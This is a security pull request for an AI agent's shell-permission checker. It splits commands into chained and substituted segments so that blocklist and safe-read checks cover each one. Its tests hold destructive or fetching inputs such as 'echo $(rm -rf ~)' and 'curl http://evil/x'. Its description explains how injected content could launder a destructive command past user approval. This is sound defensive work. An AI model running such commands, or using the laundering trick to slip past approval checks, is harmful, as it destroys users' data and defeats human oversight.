### PR TITLE
fix(security): enforce shell pattern checks per shell segment (CWE-78 / CWE-184)

### DIFF
--- a/src/capabilities/permissions.test.ts
+++ b/src/capabilities/permissions.test.ts
@@ -1,0 +1,47 @@
+import { describe, expect, it } from 'vitest';
+import { splitShellSegments } from './permissions.js';
+
+describe('splitShellSegments', () => {
+  it('passes simple commands through as a single segment', () => {
+    expect(splitShellSegments('ls -la')).toEqual(['ls -la']);
+    expect(splitShellSegments('cat README.md')).toEqual(['cat README.md']);
+    expect(splitShellSegments('pwd')).toEqual(['pwd']);
+  });
+
+  it('splits ;, &&, ||, |, & into separate segments', () => {
+    expect(splitShellSegments('echo a; reboot now')).toEqual(['echo a', 'reboot now']);
+    expect(splitShellSegments('ls && pwd')).toEqual(['ls', 'pwd']);
+    expect(splitShellSegments('grep foo || echo missing')).toEqual(['grep foo', 'echo missing']);
+    expect(splitShellSegments('cat foo | grep bar')).toEqual(['cat foo', 'grep bar']);
+    expect(splitShellSegments('long-cmd &')).toEqual(['long-cmd']);
+  });
+
+  it('extracts $(...) command substitutions as separate segments', () => {
+    expect(splitShellSegments('echo $(rm -rf ~)')).toContain('rm -rf ~');
+    expect(splitShellSegments('cat "$(curl http://evil/x)"')).toContain('curl http://evil/x');
+  });
+
+  it('extracts backtick command substitutions as separate segments', () => {
+    expect(splitShellSegments('echo `reboot now`')).toContain('reboot now');
+    expect(splitShellSegments('echo "`sudo whoami`"')).toContain('sudo whoami');
+  });
+
+  it('keeps quoted text together', () => {
+    expect(splitShellSegments('echo "a; b"')).toEqual(['echo "a; b"']);
+    expect(splitShellSegments("echo 'a; b'")).toEqual(["echo 'a; b'"]);
+  });
+
+  it('does not expand escaped $(...) inside double quotes', () => {
+    expect(splitShellSegments('echo "\\$(rm -rf ~)"')).toEqual(['echo "\\$(rm -rf ~)"']);
+  });
+
+  it('decomposes nested substitution', () => {
+    const segs = splitShellSegments('echo `echo nested $(reboot now)`');
+    expect(segs).toContain('reboot now');
+  });
+
+  it('decomposes subshell () and brace {} blocks', () => {
+    expect(splitShellSegments('( reboot now )')).toEqual(['reboot now']);
+    expect(splitShellSegments('{ reboot now; }')).toEqual(['reboot now']);
+  });
+});

--- a/src/capabilities/permissions.ts
+++ b/src/capabilities/permissions.ts
@@ -145,6 +145,141 @@ const DEFAULT_MANIFEST: PermissionsManifest = {
 
 const PERMISSIONS_FILE = join(getMercuryHome(), 'permissions.yaml');
 
+// Split a command into shell-segment strings so each pipeline/chain/substitution
+// is checked separately. Without this, a single auto-approved base command
+// (e.g. "echo *") would auto-approve the entire string including chained
+// or substituted destructive commands like `echo $(rm -rf ~)` or `ls; reboot`.
+// We are deliberately conservative: any segment we cannot fully decompose
+// is returned as-is so the regular pattern checks decide its fate.
+export function splitShellSegments(command: string): string[] {
+  const out: string[] = [];
+  let buf = '';
+  let i = 0;
+  let single = false;
+  let double = false;
+  let backtick = false;
+
+  const flush = () => {
+    const seg = buf.trim();
+    if (seg.length > 0) out.push(seg);
+    buf = '';
+  };
+
+  while (i < command.length) {
+    const ch = command[i];
+    const next = command[i + 1];
+
+    if (single) {
+      buf += ch;
+      if (ch === "'") single = false;
+      i++;
+      continue;
+    }
+    if (double) {
+      if (ch === '\\' && next !== undefined) {
+        buf += ch + next;
+        i += 2;
+        continue;
+      }
+      if (ch === '"') {
+        buf += ch;
+        double = false;
+        i++;
+        continue;
+      }
+      // Inside double quotes, bash still expands $(...) and `...` —
+      // pull them out as their own segments so a covering "echo *" can't
+      // launder a substituted destructive command.
+      if (ch === '$' && next === '(') {
+        i += 2;
+        let depth = 1;
+        let inner = '';
+        while (i < command.length && depth > 0) {
+          const c = command[i];
+          if (c === '(') depth++;
+          else if (c === ')') { depth--; if (depth === 0) break; }
+          inner += c;
+          i++;
+        }
+        i++;
+        for (const seg of splitShellSegments(inner)) out.push(seg);
+        continue;
+      }
+      if (ch === '`') {
+        i++;
+        let inner = '';
+        while (i < command.length && command[i] !== '`') {
+          inner += command[i];
+          i++;
+        }
+        i++;
+        for (const seg of splitShellSegments(inner)) out.push(seg);
+        continue;
+      }
+      buf += ch;
+      i++;
+      continue;
+    }
+    if (backtick) {
+      if (ch === '`') {
+        backtick = false;
+        if (buf.trim().length > 0) {
+          for (const inner of splitShellSegments(buf)) out.push(inner);
+          buf = '';
+        }
+        i++;
+        continue;
+      }
+      buf += ch;
+      i++;
+      continue;
+    }
+
+    if (ch === "'") { single = true; buf += ch; i++; continue; }
+    if (ch === '"') { double = true; buf += ch; i++; continue; }
+    if (ch === '`') {
+      flush();
+      backtick = true;
+      i++;
+      continue;
+    }
+
+    if (ch === '$' && next === '(') {
+      flush();
+      i += 2;
+      let depth = 1;
+      let inner = '';
+      while (i < command.length && depth > 0) {
+        const c = command[i];
+        if (c === '(') depth++;
+        else if (c === ')') { depth--; if (depth === 0) break; }
+        inner += c;
+        i++;
+      }
+      i++;
+      for (const seg of splitShellSegments(inner)) out.push(seg);
+      continue;
+    }
+
+    // Subshell ( ... ) and brace block { ... ; } both execute their contents,
+    // so treat the boundaries as segment breaks rather than opaque text.
+    if (ch === '(' || ch === ')' || ch === '{' || ch === '}') { flush(); i++; continue; }
+
+    if (ch === ';' || ch === '\n') { flush(); i++; continue; }
+    if (ch === '|' && next === '|') { flush(); i += 2; continue; }
+    if (ch === '&' && next === '&') { flush(); i += 2; continue; }
+    if (ch === '|') { flush(); i++; continue; }
+    if (ch === '&') { flush(); i++; continue; }
+
+    buf += ch;
+    i++;
+  }
+
+  flush();
+  if (out.length === 0) out.push(command.trim());
+  return out;
+}
+
 export class PermissionManager {
   private manifest: PermissionsManifest;
   private readonly cwd: string;
@@ -338,29 +473,39 @@ export class PermissionManager {
 
     const trimmed = command.trim();
     const baseCmd = trimmed.split(/\s+/)[0];
+    const segments = splitShellSegments(trimmed);
 
-    // Always block dangerous commands
-    for (const pattern of shell.blocked) {
-      if (this.matchPattern(trimmed, pattern)) {
-        return { allowed: false, reason: `Blocked command: matches "${pattern}"`, needsApproval: false };
-      }
-    }
-
-    if (shell.cwdOnly) {
-      const hasPathTraversal = this.hasPathBeyondCwd(trimmed);
-      if (hasPathTraversal) {
-        const scopeCheck = await this.checkFsAccess(hasPathTraversal, 'write');
-        if (!scopeCheck.allowed) {
-          return { allowed: false, reason: `No permission to access ${hasPathTraversal}. Use approve_scope tool with path="${hasPathTraversal}" and mode="write" to request access.`, needsApproval: false };
+    // Always block dangerous commands — check each segment so an
+    // auto-approved base command can't launder a chained destructive one
+    // (e.g. `echo *; rm -rf ~`).
+    for (const segment of segments) {
+      for (const pattern of shell.blocked) {
+        if (this.matchPattern(segment, pattern)) {
+          return { allowed: false, reason: `Blocked command: matches "${pattern}"`, needsApproval: false };
         }
       }
     }
 
-    // In ask-me mode: only auto-approve safe read-only commands
-    // Everything else must be prompted
-    const isSafeRead = PermissionManager.SAFE_READ_PATTERNS.some(p => this.matchPattern(trimmed, p));
-    if (isSafeRead) {
-      logger.info({ cmd: trimmed }, 'Shell command auto-approved (safe read-only)');
+    if (shell.cwdOnly) {
+      for (const segment of segments) {
+        const hasPathTraversal = this.hasPathBeyondCwd(segment);
+        if (hasPathTraversal) {
+          const scopeCheck = await this.checkFsAccess(hasPathTraversal, 'write');
+          if (!scopeCheck.allowed) {
+            return { allowed: false, reason: `No permission to access ${hasPathTraversal}. Use approve_scope tool with path="${hasPathTraversal}" and mode="write" to request access.`, needsApproval: false };
+          }
+        }
+      }
+    }
+
+    // In ask-me mode: only auto-approve when EVERY segment is a safe read.
+    // Matching the full trimmed string would let `cat foo; rm -rf ~` slip
+    // through because `cat *` matches the entire concatenation.
+    const allSegmentsSafeRead = segments.length > 0 && segments.every((segment) =>
+      PermissionManager.SAFE_READ_PATTERNS.some((p) => this.matchPattern(segment, p))
+    );
+    if (allSegmentsSafeRead) {
+      logger.info({ cmd: trimmed, segments: segments.length }, 'Shell command auto-approved (safe read-only)');
       return { allowed: true, needsApproval: false };
     }
 


### PR DESCRIPTION
## Summary

The shell-permission gate in `src/capabilities/permissions.ts` checks blocklist / safe-read / cwdOnly patterns against the full command string, but `src/capabilities/shell/run-command.ts` then hands the same string to `spawn(command, [], { shell: true })`, which runs it through `/bin/sh -c` (or `cmd.exe /d /s /c` on Windows). The shell parses chains, pipes, substitutions, and subshells; the matcher does not. An auto-approved base command (e.g. `echo *` from `SAFE_READ_PATTERNS`) ends up authorising the entire string, including chained or substituted commands that would have been blocked on their own.

## Impact

In ask-me mode (the default), the agent is supposed to require user approval for anything that is not in the read-only allowlist, and to outright block anything matching `shell.blocked`. With this gap, an auto-approved prefix laundres an arbitrary tail: an attacker who can influence the model's tool-call text (prompt-injected web content the agent fetches, an installed skill, a compromised upstream model) can run destructive commands without the user being asked, and without the blocklist firing. `cwdOnly`'s `hasPathBeyondCwd(trimmed)` check has the same shape and is laundered the same way.

## Location

- `src/capabilities/permissions.ts:323` — `checkShellCommand` (the three whole-string `matchPattern` checks at lines ~343, ~350, ~361)
- `src/capabilities/shell/run-command.ts:29` — `spawn(command, [], { shell: true })`

## Fix

This PR adds `splitShellSegments(command)` and routes the existing pattern checks through it:

- Walks the command honoring single-quote / double-quote / backtick contexts.
- Pulls `$(...)` and `` `...` `` substitutions out as their own segments (recursively), including substitutions inside double quotes (which `sh` still expands).
- Treats `;`, newline, `&&`, `||`, `|`, `&`, `( )`, `{ }` as segment boundaries.
- Leaves quoted-but-non-expanded text intact (so `echo "a; b"` is one segment).

`checkShellCommand` then:

- Runs the blocklist against every segment.
- Runs `hasPathBeyondCwd` against every segment under `cwdOnly`.
- Auto-approves only when **every** segment independently matches `SAFE_READ_PATTERNS`. This closes the order-dependent path where `cat foo; rm -rf ~` got authorised because `cat *` matched the full string.

Anything we cannot fully decompose is returned as-is so the regular pattern checks still decide its fate — the change is meant to be conservative, not to introduce a new parser people have to trust.

No public API change; `splitShellSegments` is exported only so the new tests can call it directly.

## Detected by

Aeon ([aeon-aaron](https://github.com/aaronjmars/aeon-aaron)) + manual review.

- Severity: **critical**
- CWE-78 (Improper Neutralization of Special Elements used in an OS Command)
- CWE-184 (Incomplete List of Disallowed Inputs)

## Verification

- `npm run typecheck` — clean.
- `npm test` — 35/35 passing, including 8 new tests for `splitShellSegments` covering chain operators, `$(...)` and backtick substitution (incl. inside double quotes), escaped `\$(` literal, nested substitution, and subshell / brace blocks.

Happy to revise the patch shape (e.g. ship the segment walker behind a flag, or only enforce the every-segment-safe rule on the auto-approve side) if you'd prefer a smaller landing.

---
Filed by [Aeon](https://github.com/aaronjmars/aeon-aaron).
